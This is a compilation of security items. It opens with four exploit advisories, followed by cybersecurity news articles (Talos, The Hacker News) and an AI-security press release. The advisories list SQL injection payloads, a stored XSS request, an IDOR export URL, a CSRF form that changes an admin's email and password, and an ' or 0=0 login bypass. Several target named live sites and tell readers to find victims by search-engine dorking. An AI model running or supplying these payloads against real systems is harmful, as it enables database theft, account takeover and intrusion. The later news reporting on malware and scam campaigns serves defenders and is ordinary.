Leads Manager Tool suffers from remote SQL injection and cross site scripting vulnerabilities.

    [x]========================================================================================================================================[x] | Title        : Leads Manager Tool SQL & XSS[stored)] Vulnerabilities | Software     : Leads Manager Tool Using PHP and MySQL with Source Code | Create By  : https://www.sourcecodester.com/users/remyandrade | First Release: 25/01/22 | Download     : https://www.sourcecodester.com/php/17510/leads-manager-tool-using-php-and-mysql-source-code.html | Date         : 30 Agustus 2024 | Author       : OoN_Boy[x]========================================================================================================================================[x] | Technology       : PHP | Database         : MySQL | Price            : FREE | Description      : Leads Manager Tool, a comprehensive web application designed to streamline the process of managing business leads. Built with the power of PHP and MySQL, this tool offers a seamless and user-friendly experience for storing, updating, and organizing lead information[x]========================================================================================================================================[x][O] Exploit    http://localhost/leads-manager-tool/endpoint/delete-leads.php?leads=[SQL]  http://localhost/leads-manager-tool/endpoint/add-leads.php    [O] Proof of concept  [SQL]  Parameter: leads (GET)    Type: boolean-based blind  Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause  Payload: leads= --emurate' RLIKE (SELECT (CASE WHEN (8305=8305) THEN 0x202d2d656d7572617465 ELSE 0x28 END))-- rUwl  Type: error-based  Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  Payload: leads= --emurate' OR (SELECT 1382 FROM(SELECT COUNT(*),CONCAT(0x7162787171,(SELECT (ELT(1382=1382,1))),0x7176706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- vKls  Type: stacked queries  Title: MySQL >= 5.0.12 stacked queries (comment)  Payload: leads= --emurate';SELECT SLEEP(5)#  Type: time-based blind  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  Payload: leads= --emurate' AND (SELECT 1244 FROM (SELECT(SLEEP(5)))fAev)-- ZNBt    [XSS]    POST /leads-manager-tool/endpoint/add-leads.php HTTP/1.1  Host: 127.0.0.1  Accept-Encoding: gzip, deflate, br  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  Accept-Language: en-US;q=0.9,en;q=0.8  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36  Connection: close  Cache-Control: max-age=0  Origin: http://127.0.0.1  Upgrade-Insecure-Requests: 1  Referer: http://127.0.0.1/leads-manager-tool/  Content-Type: application/x-www-form-urlencoded  Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="126", "Chromium";v="126"  Sec-CH-UA-Platform: Windows  Sec-CH-UA-Mobile: ?0  Content-Length: 85  leads_name=Vrs<script>alert(1)</script>Hck&email_add=vrs-hck@maho.id&phone_number=911-911-9111    [x]========================================================================================================================================[x][O] GreetzBatamHacker, Vrs-hCk, c0li, h4ntu, Opay, Ndet, Ipay, Paman, NoGe, H312Y, dono, pizzyroot, zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^[x]========================================================================================================================================[x]

Leads Manager Tool SQL Injection / Cross Site Scripting

Appointment Scheduler version 3.0 suffers from an insecure direct object reference vulnerability.

    =============================================================================================================================================| # Title     : Appointment Scheduler v3.0 IDOR Vulnerability                                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://auth.phpjabbers.com/download/727641/53089/d9b13cca42bb941a9f06d96f22fb7743                                          |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : Allows you as a visitor to access the control panel without permissions.[+] use payload : index.php?controller=pjAdminBookings&action=pjActionExport[+] http://127.0.0.1/www/ wongkit.com.hk/appointment/index.php?controller=pjAdminBookings&action=pjActionExportGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Appointment Scheduler 3.0 Insecure Direct Object Reference

AccPack Cop version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : AccPack Cop v1.0 CSRF Vulnerability                                                                                         |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            |  
| # Vendor    : http://webpay.com.np/#Product                                                                                               |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following HTML code modifies the admin information.

[+] Go to the line 5. Set the target site link Save changes and apply . 

[+] infected file : cms/user/modify.php.

[+] http://127.0.0.1/q7.3/cms/user/modify.php.

[+] save code as poc.html 

[+] payload : 

</head>  
<body>  
  <div class="container">  
    <div class="text-center" style="padding: 5px"><h3>User Edit</h3></div>  
    <form action="https://tssclahanorgnp/cms/user/modify.php" method="POST"  enctype="multipart/form-data">  
      <div hidden="true">  
        <input type="text" name="id" id="id" value="1">  
      </div>  
       <div>  
        <label for='email'>Email</label><input  type="text" class="form-control" name='email' id='email' value="indoushka@mail.dz">  
       </div>  
       <div>  
        <label for='password'>Password</label><input  type="text" class="form-control" name='password' id='password' type='password' value="123456">  
       </div>  
       <tr>  
       <div>  
        <label for='status'>Status</label>  
          <input type="radio" name="status" id="actiive" value="1" checked /> <label for="active">Active</label>  
          <input type="radio" name="status" id="passive" value="0" /><label for="passive">Passive</label>

               </div>     
       <div style='height:80'>  
        <input type='submit' value='Submit'><input type='reset' Value='Reset'>  
       </div>  
    </form>  
  </div>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

AccPack Cop 1.0 Cross Site Request Forgery

AccPack Buzz version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : AccPack Buzz v1.0 Auth By Pass Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/#Product                                                                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] Panel : http://127.0.0.1/jamiatulamanepal.orgnp/cms/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

AccPack Buzz 1.0 SQL Injection

The lesson for users, especially if you’re a private company that primarily uses GitHub, is just to understand the inherent dangers of using open-source software.

Thursday, August 1, 2024 14:00

A recently discovered security issue in GitHub and other, similar, control system products seem to fit into the classic “it’s a feature, not a bug” category. 

Security researchers last week published their findings into some research of how deleted forks in GitHub work, potentially leaving the door open for a malicious actor to steal a project key and then view deleted forks and versions of any project on GitHub. 

This may not necessarily even be a \*new\* discovery, because users on social media were quick to point out that these products have always been designed this way, so it’s not like a new sort of exploit had just been published. But the publishing of these findings came after Truffle Security says a major tech company accidentally leaked a private key for an employee GitHub account, and despite totally deleting the repo thinking that would take care of the leak, it was still exposed and accessed by potentially malicious users.  

This potential issue has not been tested in similar software like GitLab or Bitbucket, but conceivably, they’ve all been designed in the same way. The major difference for GitHub is that deleted or unpublished commits can be downloaded via a fork if the user has the correct identifying hash (or at least a portion of it).  

The issue here is there is no real patch or fix to address this issue, and now it’s widely known and been publicized on the internet.  

GitHub told The Register that this is part of how the software is designed, and there doesn’t appear any efforts underway to change that. 

“GitHub is committed to investigating reported security issues. We are aware of this report and have validated that this is expected and documented behavior inherent to how fork networks work. You can read more about how deleting or changing visibility affects repository forks in our documentation,” the company said in a statement to online publication The Register. 

The lesson for users, especially if you’re a private company that primarily uses GitHub, is just to understand the inherent dangers of using open-source software like those projects that are created and managed on GitHub. (Martin Lee and I will be discussing more in tomorrow morning’s episode of Talos Takes.) 

The other option is that, if you’re a GitHub user and at some point, published a key, you should probably just assume someone has copied it by now. That means not only deleting references to that key but rotating the key and checking if it was used improperly.  

**The one big thing **

Cisco Talos recently discovered a malicious campaign that compromised a Taiwanese Government Affiliated Research Institute that started as early as July 2023, delivering Shadowpad malware, Cobalt Strike and other customized tools for post-compromise activities. The activity conducted on the victim endpoint matches the Chinese hacking group APT41. The combined use of malware, open-source tools and projects procedures and post-compromise activity matches this group method of operation. ShadowPad, widely considered the successor of PlugX, is a modular remote-access-trojan (RAT) only seen sold to Chinese hacking groups. 

**Why do I care? **

APT41 is a prolific and dangerous threat actor that all users and cybersecurity practitioners should be keeping track of. The group, also known as Amoeba, Bronze Atlas, Wicked Spider, and more, is known for carrying out Chinese state-sponsored espionage activity and other financially motivated cybercrimes. We have also uncovered that APT41 created a tailored loader to inject a proof of concept for CVE-2018-0824, a remote code execution vulnerability in Microsoft COM for Windows, directly into memory to achieve local privilege escalation. 

**So now what? **

This threat actor commonly tries to exploit CVE-2018-0824, which Microsoft has long had a patch available for. Users should ensure all Windows systems are up to date to the latest version to protect against this vulnerability (and the hundreds of others that exist in Windows anyway!). Additionally, Talos has released new ClamAV signatures and Snort rules to detect the ShadowPad malware and Cobalt Strike beacons used by APT41.  

**Top security headlines of the week **

**Another Microsoft outage just days after the massive CrowdStrike-related incident was the result of a cyber attack, according to the company.** The outage Wednesday morning affected Microsoft Outlook and the video game “Minecraft” for almost 10 hours and forced thousands of users to report issues. The incident gained increased interest in the wake of a massive outage last weekend that resulted in international disruptions and tens of millions of dollars in damages. Microsoft stated after the outage was resolved that the initial issue was caused by a distributed denial-of-service attack, and additional mitigations to defend against that DDoS attack failed. A notification on Microsoft’s website said the outage affected Microsoft Azure, the cloud platform that powers many of its services, and Microsoft 365. It also said cloud systems Intune and Entra were affected. Even though Microsoft had no direct involvement in the previous outage, the company has been under a microscope since the incident. That outage was caused by a faulty update to CrowdStrike Falcon that was pushed to many versions of Windows 11. (BBC, Forbes) 

**A new version of the Mandrake Android spyware appears to be spreading through phony apps on the Google Play store.** The revised spyware, used to unknowingly track users’ location and activity on their mobile devices, has been downloaded more than 32,000 times since 2022, according to new research. The original version of Mandrake was active between two periods, one in 2016 and 2017 and another between 2018 and 2020. Besides the usual spyware functions, Mandrake can completely wipe a device with a killswitch, leaving no trace of the malware. Spyware commonly targets highly vulnerable individuals, including politicians, activists and journalists. Spouses and romantic partners may also use it to unknowingly track their significant others. The most popular fake app used was AirFS, an advertised file-sharing app, that was downloaded more than 30,000 times before it was removed from the Google Play store. Once the user installs the phony app, the Mandrake malware is unknowingly installed, and it asks for the user’s permission to draw overlays on their screen under the guise of the illegitimate app. (Bleeping Computer, Security Affairs) 

**North Korean APT Andariel is accused of carrying out a series of espionage-focused campaigns targeting U.S. weapon systems over the past two years.** Security researchers say the state-sponsored group targeted healthcare providers, defense contractors and nuclear facilities, possibly to steal information that could improve the country’s own weapons programs. North Korea is constantly using its posession of nuclear weapons to try and intimidate Western countries. Separately, the U.S. indicted a North Korean citizen for his alleged involvement in several cyber attacks against American hospitals. The individual, suspected of having ties to North Korea’s Reconnaissance General Bureau, allegedly targeted hospitals in Florida and Kansas, healthcare providers in Arkansas and Connecticut, and a clinic in Colorado. The U.S. State Department is offering a reward of up to $10 million for information that leads to the arrest of Rim Jong Hyok. (The Record, CNN) 

**Can’t get enough Talos? **

*   Ransomware and email attacks are hitting businesses more than ever before 
*   Cisco Talos: An oral history 
*   Vulnerability Roundup: Out-of-bounds read vulnerability in NVIDIA driver; Open-source flashcard software contains multiple security issues 
*   Talos Takes Ep. #192: Threat actor trends and the most prevalent malware from the past quarter 

**Upcoming events where you can find Talos **

**_BlackHat USA_** **_(Aug. 3 – 8)_** 

_Las Vegas, Nevada_ 

**_Defcon_** **_(Aug. 8 – 11)_** 

_Las Vegas, Nevada_ 

**_BSides Krakow_** **_(Sept. 14)_**  

_Krakow, Poland_ 

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
**MD5:** 2915b3f8b703eb744fc54c81f4a9c67f f  
**Typical Filename:** VID001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Worm.Coinminer::1201

**SHA 256:** c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0  
**MD5:** 8c69830a50fb85d8a794fa46643493b2  
**Typical Filename:** AAct.exe  
**Claimed Product:** N/A  
**Detection Name:** PUA.Win.Dropper.Generic::1201

**SHA 256:** 161937ed1502c491748d055287898dd37af96405aeff48c2500b834f6739e72d  
**MD5:** fd743b55d530e0468805de0e83758fe9  
**Typical Filename:** KMSAuto Net.exe  
**Claimed Product:** KMSAuto Net  
**Detection Name:** W32.File.MalParent

**SHA 256:** 24283c2eda68c559f85db7bf7ccfe3f81e2c7dfc98a304b2056f1a7c053594fe  
**MD5:** 49ae44d48c8ff0ee1b23a310cb2ecf5a  
**Typical Filename:** nYzVlQyRnQmDcXk  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Scar::tpd

**SHA 256:** bea312ccbc8a912d4322b45ea64d69bb3add4d818fd1eb7723260b11d76a138a  
**MD5:** 200206279107f4a2bb1832e3fcd7d64c  
**Typical Filename:** lsgkozfm.bat  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Scar::tpd

There is no real fix to the security issues recently found in GitHub and other similar software

In yet another sign that threat actors are always looking out for new ways to trick users into downloading malware, it has come to light that the question-and-answer (Q&A) platform known as Stack Exchange has been abused to direct unsuspecting developers to bogus Python packages capable of draining their cryptocurrency wallets.
"Upon installation, this code would execute automatically,

In yet another sign that threat actors are always looking out for new ways to trick users into downloading malware, it has come to light that the question-and-answer (Q&A) platform known as Stack Exchange has been abused to direct unsuspecting developers to bogus Python packages capable of draining their cryptocurrency wallets.

"Upon installation, this code would execute automatically, setting in motion a chain of events designed to compromise and control the victim's systems, while also exfiltrating their data and draining their crypto wallets," Checkmarx researchers Yehuda Gelb and Tzachi Zornstain said in a report shared with The Hacker News.

The campaign, which began on June 25, 2024, specifically singled out cryptocurrency users involved with Raydium and Solana. The list of rogue packages uncovered as part of the activity is listed below -

*   raydium (762 downloads)
*   raydium-sdk (137 downloads)
*   sol-instruct (115 downloads)
*   sol-structs (292 downloads)
*   spl-types (776 downloads)

The packages have been collectively downloaded 2,082 times. They are no longer available for download from the Python Package Index (PyPI) repository.

The malware concealed within the package served a full-fledged information stealer, casting a wide net of data, including web browser passwords, cookies, and credit card details, cryptocurrency wallets, and information associated with messaging apps like Telegram, Signal, and Session.

It also packed in capabilities to capture screenshots of the system, and search for files containing GitHub recovery codes and BitLocker keys. The gathered information was then compressed and exfiltrated to two different Telegram bots maintained by the threat actor.

Separately, a backdoor component present in the malware granted the attacker persistent remote access to victims' machines, enabling potential future exploits and long-term compromise.

The attack chain spans multiple stages, with the "raydium" package listing "spl-types" as a dependency in an attempt to conceal the malicious behavior and give users the impression that it was legitimate.

A notable aspect of the campaign is the use of Stack Exchange as a vector to drive adoption by posting ostensibly helpful answers referencing the package in question to developer questions related to performing swap transactions in Raydium using Python.

"By choosing a thread with high visibility — garnering thousands of views—the attacker maximized their potential reach," the researchers said, adding it was done so to "lend credibility to this package and ensure its widespread adoption."

While the answer no longer exists on Stack Exchange, The Hacker News found references to "raydium" in another unanswered question posted on the Q&A site dated July 9, 2024: "I have been struggling for nights to get a swap on solana network running in python 3.10.2 installed solana, solders and Raydium but I can't get it to work," a user said.

References to "raydium-sdk" have also surfaced in a post titled "How to Buy and Sell Tokens on Raydium using Python: A Step-by-Step Solana Guide" that was shared by a user named SolanaScribe on the social publishing platform Medium on June 29, 2024.

It's currently not clear when the packages were removed from PyPI, as two other users have responded to the Medium post seeking help from the author about installing "raydium-sdk" as recently as six days ago. Checkmarx told The Hacker News that the post is not the work of the threat actor.

This is not the first time bad actors have resorted to such a malware distribution method. Earlier this May, Sonatype revealed how a package named pytoileur was promoted via another Q&A service called Stack Overflow to facilitate cryptocurrency theft.

If anything, the development is evidence that attackers are leveraging trust in these community-driven platforms to push malware, leading to large-scale supply chain attacks.

"A single compromised developer can inadvertently introduce vulnerabilities into an entire company's software ecosystem, potentially affecting the whole corporate network," the researchers said. "This attack serves as a wake-up call for both individuals and organizations to reassess their security strategies."

The development comes as Fortinet FortiGuard Labs detailed a malicious PyPI package called zlibxjson that packed features to steal sensitive information, such as Discord tokens, cookies saved in Google Chrome, Mozilla Firefox, Brave, and Opera, and stored passwords from the browsers. The library attracted a total of 602 downloads before it was pulled from PyPI.

"These actions can lead to unauthorized access to user accounts and the exfiltration of personal data, clearly classifying the software as malicious," security researcher Jenna Wang said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Hackers Distributing Malicious Python Packages via Popular Developer Q&A Platform

Cybersecurity researchers have uncovered a new Android remote access trojan (RAT) called BingoMod that not only performs fraudulent money transfers from the compromised devices but also wipes them in an attempt to erase traces of the malware.
Italian cybersecurity firm Cleafy, which discovered the RAT towards the end of May 2024, said the malware is under active development. It attributed the

Banking Trojan / Cyber Fraud

Cybersecurity researchers have uncovered a new Android remote access trojan (RAT) called **BingoMod** that not only performs fraudulent money transfers from the compromised devices but also wipes them in an attempt to erase traces of the malware.

Italian cybersecurity firm Cleafy, which discovered the RAT towards the end of May 2024, said the malware is under active development. It attributed the Android trojan to a likely Romanian-speaking threat actor owing to the presence of Romanian language comments in the source code associated with early versions.

"BingoMod belongs to the modern RAT generation of mobile malware, as its remote access capabilities allow threat actors (TAs) to conduct Account Takeover (ATO) directly from the infected device, thus exploiting the on-device fraud (ODF) technique," researchers Alessandro Strino and Simone Mattia said.

It's worth mentioning here that this technique has been observed in other Android banking trojans, such as Medusa (aka TangleBot), Copybara, and TeaBot (aka Anatsa).

BingoMod, like BRATA, also stands out for employing a self-destruction mechanism that's designed to remove any evidence of the fraudulent transfer on the infected device so as to hinder forensic analysis. While this functionality is limited to the device's external storage, it's suspected that the remote access features could be used to initiate a complete factory reset.

Some of the identified apps masquerade as antivirus tools and an update for Google Chrome. Once installed, the app prompts the user to grant it accessibility services permissions, using it to initiate malicious actions.

This includes executing the main payload and locking out the user from the main screen to collect device information, which is then exfiltrated to an attacker-controlled server. It also abuses the accessibility services API to steal sensitive information displayed on the screen (e.g., credentials and bank account balances) and give itself permission to intercept SMS messages.

To initiate money transfers directly from compromised devices, BingoMod establishes a socket-based connection with the command-and-control infrastructure (C2) to receive as many as 40 commands remotely to take screenshots using Android's Media Projection API and interact with the device in real-time.

This also means that the ODF technique relies on a live operator to perform a money transfer of up to €15,000 (~$16,100) per transaction as opposed to leveraging an Automated Transfer System (ATS) to carry out financial fraud at scale.

Another crucial aspect is the threat actor's emphasis on evading detection using code obfuscation techniques and the ability to uninstall arbitrary apps from the compromised device, indicating that the malware authors are prioritizing simplicity over advanced features.

"In addition to real-time screen control, the malware shows phishing capabilities through Overlay Attacks and fake notifications," the researchers said. "Unusually, overlay attacks are not triggered when specific target apps are opened but are initiated directly by the malware operator."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Android Banking Trojan BingoMod Steals Money, Wipes Devices

Google has announced that it's adding a new layer of protection to its Chrome browser through what's called app-bound encryption to prevent information-stealing malware from grabbing cookies on Windows systems.
"On Windows, Chrome uses the Data Protection API (DPAPI) which protects the data at rest from other users on the system or cold boot attacks," Will Harris from the Chrome security team

Data Encryption / Browser Security

Google has announced that it's adding a new layer of protection to its Chrome browser through what's called app-bound encryption to prevent information-stealing malware from grabbing cookies on Windows systems.

"On Windows, Chrome uses the Data Protection API (DPAPI) which protects the data at rest from other users on the system or cold boot attacks," Will Harris from the Chrome security team said. "However, the DPAPI does not protect against malicious applications able to execute code as the logged in user – which info-stealers take advantage of."

App-bound encryption is an improvement over DPAPI in that it interweaves an app's identity (i.e., Chrome in this case) into encrypted data to prevent another app on the system from accessing it when decryption is attempted.

"Because the app-bound service is running with system privileges, attackers need to do more than just coax a user into running a malicious app," Harris said. "Now, the malware has to gain system privileges, or inject code into Chrome, something that legitimate software shouldn't be doing."

Given that the method strongly binds the encryption key to the machine, it will not function correctly in environments where Chrome profiles roam between multiple machines. Organizations that support roaming profiles are encouraged to follow its best practices and configure the ApplicationBoundEncryptionEnabled policy.

The change, which went live last week with the release of Chrome 127, applies only to cookies, although Google said it intends to expand this protection to passwords, payment data, and other persistent authentication tokens.

Back in April, the tech giant outlined a technique that employs a Windows event log type called DPAPIDefInformationEvent to reliably detect access to browser cookies and credentials from another application on the system.

It's worth noting that the web browser secures passwords and cookies in Apple macOS and Linux systems using Keychain services and system-provided wallets such as kwallet or gnome-libsecret, respectively.

The development comes amid a slew of security improvements added to Chrome in recent months, including enhanced Safe Browsing, Device Bound Session Credentials (DBSC), and automated scans when downloading potentially suspicious and malicious files.

"App-bound encryption increases the cost of data theft to attackers and also makes their actions far noisier on the system," Harris said. "It helps defenders draw a clear line in the sand for what is acceptable behavior for other apps on the system."

It also follows Google's announcement that it no longer plans to deprecate third-party cookies in Chrome, prompting the World Wide Web Consortium (W3C) to reiterate that they enable tracking and that the decision undermines the progress achieved so far to make the web work without third-party cookies.

"Tracking and subsequent data collection and brokerage can support micro-targeting of political messages, which can have a detrimental impact on society," it said. "The unfortunate climb-down will also have secondary effects, as it is likely to delay cross-browser work on effective alternatives to third-party cookies."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Google Chrome Adds App-Bound Encryption to Protect Cookies from Malware

Facebook users are the target of a scam e-commerce network that uses hundreds of fake websites to steal personal and financial data using brand impersonation and malvertising tricks.
Recorded Future's Payment Fraud Intelligence team, which detected the campaign on April 17, 2024, has given it the name ERIAKOS owing to the use of the same content delivery network (CDN) oss.eriakos[.]com.
"These

Online Fraud / Malvertising

Facebook users are the target of a scam e-commerce network that uses hundreds of fake websites to steal personal and financial data using brand impersonation and malvertising tricks.

Recorded Future's Payment Fraud Intelligence team, which detected the campaign on April 17, 2024, has given it the name ERIAKOS owing to the use of the same content delivery network (CDN) oss.eriakos\[.\]com.

"These fraudulent sites were accessible only through mobile devices and ad lures, a tactic aimed at evading automated detection systems," the company said, noting the network comprised 608 fraudulent websites and that the activity spans several short-lived waves.

A notable aspect of the sophisticated campaign is that it exclusively targeted mobile users who accessed the scam sites via ad lures on Facebook, some of which relied on limited-time discounts to entice users into clicking on them. Recorded Future said as many as 100 Meta Ads related to a single scam website are served in a day.

The counterfeit websites and ads have been found to mainly impersonate a major online e-commerce platform and a power tools manufacturer, as well as single out victims with bogus sales offers for products from various well-known brands. Another crucial distribution mechanism entails the use of fake user comments on Facebook to lure potential victims.

"Merchant accounts and related domains linked to the scam websites are registered in China, indicating that the threat actors operating this campaign likely established the business they use to manage the scam merchant accounts in China," Recorded Future noted.

This is not the first time criminal e-commerce networks have sprung up with an aim to harvest credit card information and make illicit profits off fake orders. In May 2024, a massive network of 75,000 phony online stores – dubbed BogusBazaar – was discovered to have made more than $50 million by advertising shoes and apparel by well-known brands at low prices.

Then last month, Orange Cyberdefense revealed a previously undocumented traffic direction system (TDS) called R0bl0ch0n TDS that's used to promote affiliate marketing scams through a network of fake shop and sweepstake survey sites with the goal of obtaining credit card information.

"Several distinct vectors are used for the initial dissemination of the URLs that redirect through the R0bl0ch0n TDS, indicating that these campaigns are likely carried out by different affiliates," security researcher Simon Vernin said.

The development comes as fake Google ads displayed when searching for Google Authenticator on the search engine have been observed redirecting users to a rogue site ("chromeweb-authenticators\[.\]com") that delivers a Windows executable hosted on GitHub, which ultimately drops an information stealer named DeerStealer.

What makes the ads seemingly legitimate is that they appear as if they are from "google.com" and the advertiser's identity is verified by Google, according to Malwarebytes, which said "some unknown individual was able to impersonate Google and successfully push malware disguised as a branded Google product as well."

Malvertising campaigns have also been spotted disseminating various other malware families such as SocGholish (aka FakeUpdates), MadMxShell, and WorkersDevBackdoor, with Malwarebytes uncovering infrastructure overlaps between the latter two, indicating that they are likely run by the same threat actors.

On top of that, ads for Angry IP Scanner have been used to lure users to fake websites, and the email address "goodgoo1ge@protonmail\[.\]com" has been used to register domains delivering both MadMxShell and WorkersDevBackdoor.

"Both malware payloads have the capability to collect and steal sensitive data, as well as provide a direct entry path for initial access brokers involved in ransomware deployment," security researcher Jerome Segura said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Facebook Ads Lead to Fake Websites Stealing Credit Card Information

PRESS RELEASE

SEATTLE -- July 31, 2024 – Protect AI, a leader in AI security, today announced the acquisition of SydeLabs, which specializes in the automated attack simulation (red teaming) of generative AI (GenAI) systems. This strategic acquisition enhances Protect AI's platform ability to test and improve LLM security and extends the company’s lead as the only provider of end-to-end AI security solutions.

SydeLabs: A Leader in AI Red Teaming

Generative AI and LLM adoption are revolutionizing industries. LLMs are being integrated into critical end user applications such as customer service, finance and healthcare. However the complexity and scale of the technology has exacerbated security concerns that traditional application security processes simply can not keep up with or address effectively. 

SydeLabs was founded less than a year ago by former product and engineering leads from Google and MPL, and has quickly established itself as a pioneer in the field of AI security. Based in Bangalore, India, SydeLabs has developed SydeBox, a cutting-edge product designed to provide comprehensive vulnerability assessments for GenAI systems. The talented team from SydeLabs will join Protect AI where they will continue to add local talent in Bangalore to complement our Seattle and Berlin based teams.

“Protect AI is continuously looking to add products to our AI security posture management platform that help our customers build a safer AI-powered world,” said Ian Swanson, CEO of Protect AI. “The acquisition of SydeLabs extends the Protect AI platform with unmatched red teaming capabilities and immediately provides our customers with the ability to stress test, benchmark and harden their large language models against security risks.” 

SydeBox will be integrated into the Protect AI Platform and rebranded as Protect AI Recon. Recon identifies potential vulnerabilities in LLMs, ensuring enterprises can deploy AI applications with confidence. Key features of Recon include no-code integration, model-agnostic scanning, and detailed threat profiling across multiple categories. Recon uses both an attack library and LLM agent based solution for red teaming and evaluating the security and safety of GenAI systems. Protect AI Recon aligns perfectly with the growing demand for robust AI security solutions, driven by formal guidance from NIST, MITRE, OWASP and CISA, as well as mandates like the Executive Order on AI Safety and Security and the EU AI Act.

“The combination of SydeLabs’ SydeBox and Protect AI’s platform provides customers a comprehensive defense-in-depth solution for building, managing, testing, deploying and monitoring LLMs,” said Ruchir Patwa, co-founder of SydeLabs. “We couldn’t be more excited about joining the Protect AI mission and the prospect of what we can achieve in terms of helping companies of all sizes adopt and deploy more secure LLMs and AI applications.”

The new Recon product will enable Protect AI to meet growing customer demand for robust AI security solutions. Customers will benefit from detailed threat profiling across jailbreaks, prompt injection attacks, input manipulations and other attack vectors, which are crucial for maintaining the integrity and security of AI systems. Recon covers six of the OWASP Top 10 for LLM applications.

“Recon, formally SydeBox, has enabled us to identify and fix security blindspots before deploying our GenAI solutions to ensure we are building the most secure and safe LLM powered applications, and that products we serve our customers are free from any security or safety loopholes,” Said Kiran Darisi, CTO and cofounder, AtomicWork.

This acquisition and new product, Recon, further enhances Protect AI’s position as the leader in the AI security market and AI Security Posture Management (AI-SPM) solutions, differentiating it from competitors and solidifying its market presence. More specifically when used alongside Layer, Protect AI’s LLM observability and monitoring solution, Recon enables organizations to harden the implementation of LLMs against the spectrum of emerging security concerns associated with GenAI usage. Partners and stakeholders will also gain from the enhanced security capabilities, ensuring that the entire AI ecosystem is better protected against potential threats.

About SydeLabs

SydeLabs is a pioneering AI security company specializing in automated red teaming for GenAI systems. Founded by former leaders from Google and MPL, SydeLabs has developed SydeBox, a leading product designed to identify and mitigate vulnerabilities in LLMs. SydeLabs’ products have been adopted by enterprises to make GenAI models and applications safe and secure, giving them the confidence to deploy these systems to production. The company is headquartered in Bangalore. 

About Protect AI

Protect AI empowers organizations to secure their AI applications with comprehensive AI Security Posture Management (AI-SPM) capabilities, enabling them to see, know, and manage their ML environments effectively. The Protect AI Platform offers end-to-end visibility, remediation, control, and governance, safeguarding AI/ML systems from security threats and risks. Founded by AI leaders from Amazon and Oracle, Protect AI is backed by top investors, including Acrew Capital, boldstart ventures, Evolution Equity Partners, Knollwood Capital, Pelion Ventures, 01 Advisors, StepStone Group, Samsung, and Salesforce Ventures. The company is headquartered in Seattle, with offices in Berlin and Bangalore. For more information, visit our website and follow us on LinkedIn and Twitter.

Tag

#google